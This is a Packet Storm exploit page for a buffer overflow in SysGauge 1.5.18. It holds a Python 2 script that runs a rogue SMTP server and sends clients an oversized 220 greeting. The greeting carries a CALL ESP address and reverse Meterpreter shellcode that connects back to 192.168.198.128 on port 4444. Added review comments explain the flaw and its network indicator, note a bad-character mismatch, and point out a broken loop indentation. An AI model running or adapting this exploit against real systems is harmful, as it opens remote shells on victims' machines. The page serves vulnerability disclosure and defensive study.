SysGauge 1.5.18 Buffer Overflow

2017-03-01T00:00:00
ID PACKETSTORM:141392
Type packetstorm
Reporter Peter Baris
Modified 2017-03-01T00:00:00

Description

                                        
`# Exploit Title: SysGauge 1.5.18 a buffer overflow in the SMTP connection verification function leads to code execution  
# Date: 2017-02-28  
# Exploit Author: Peter Baris  
# Vendor Homepage: http://www.saptech-erp.com.au  
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe  
# Version: 1.5.18  
# Tested on: Windows Server 2008 R2 Standard x64  
# CVE : requested  
  
# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below.  
# The 1st part can be max. 236 bytes   
# The 2nd part can be max. 76 (leave at least 4 NOPs)  
  
# NOTE(review): this PoC is a rogue SMTP *server*, not a client. The vulnerable
# code path is the client side: SysGauge's connection-verification feature
# connects out to an SMTP host and mishandles an over-long "220" greeting.
# For defenders the observable is therefore an outbound SMTP session whose
# server greeting is several hundred bytes long (508 bytes of payload here,
# plus the "220 " prefix and "ESMTP Sendmail \r\n" suffix) rather than any
# inbound traffic to the monitored host.
# The script is written for Python 2 (print statement on the "Listening" line,
# str objects passed straight to socket.send).
  
import socket  
  
# QtGui4.dll 0x6527635E - CALL ESP  
# Little-endian encoding of the address above; it is placed at the return
# address slot in the overflow string built below.
jmp = "\x5e\x63\x27\x65"  
nops = "\x90"*8  
  
  
# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20   
#IP: 192.168.198.128, PORT: 4444  
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest  
# NOTE(review): the two bad-char lists disagree (\x0b above, \x0d in the
# msfvenom command). The byte \x0b does occur inside rev_met_1 (third line of
# the literal), so the msfvenom list with \x0d is the one that matches the
# bytes actually embedded here; the page does not say which one was intended.
# The two pieces below are 232 and 74 bytes (306 total, the lengths the
# script prints at start-up), within the 236/76 limits stated in the header.
  
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"  
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"  
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"  
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"  
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"  
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"  
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"  
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"  
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"  
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"  
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"  
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"  
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"  
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"  
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"  
"\xc1\x48\x45\x0e\x32\x6b\x4c")  
  
  
rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"  
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"  
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"  
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"  
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"  
"\xe2\x79\xdc\x2d\x97\x97")  
  
  
# Overflow string as laid out in the header comment: 176 filler bytes,
# shellcode part 2, 2 filler bytes, the CALL ESP address, 12 filler bytes,
# 8 NOPs, shellcode part 1 (176+74+2+4+12+8+232 = 508 bytes).
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1  
port = 25  
s = socket.socket()  
# NOTE(review): 0.0.0.0 binds the rogue SMTP listener on every interface of
# the machine running the PoC, so it is reachable from any attached network,
# not only from the test client. Port 25 needs elevated privileges on most
# systems; no SO_REUSEADDR is set, so a restart may fail while the previous
# socket is in TIME_WAIT.
ip = '0.0.0.0'   
s.bind((ip, port))   
s.listen(5)   
  
  
print 'Listening on SMTP port: '+str(port)  
print(len(rev_met_1))  
print(len(rev_met_2))  
  
# Serve the oversized 220 greeting to every client that connects, then drop
# the connection; no SMTP dialogue beyond the banner is needed.
# NOTE(review): the loop body below is not indented in this copy of the page,
# which is a syntax error as shown; this looks like indentation lost in
# extraction and is left untouched here.
while True:  
conn, addr = s.accept()   
conn.send('220 '+buffer+'ESMTP Sendmail \r\n')  
conn.close()  
  
`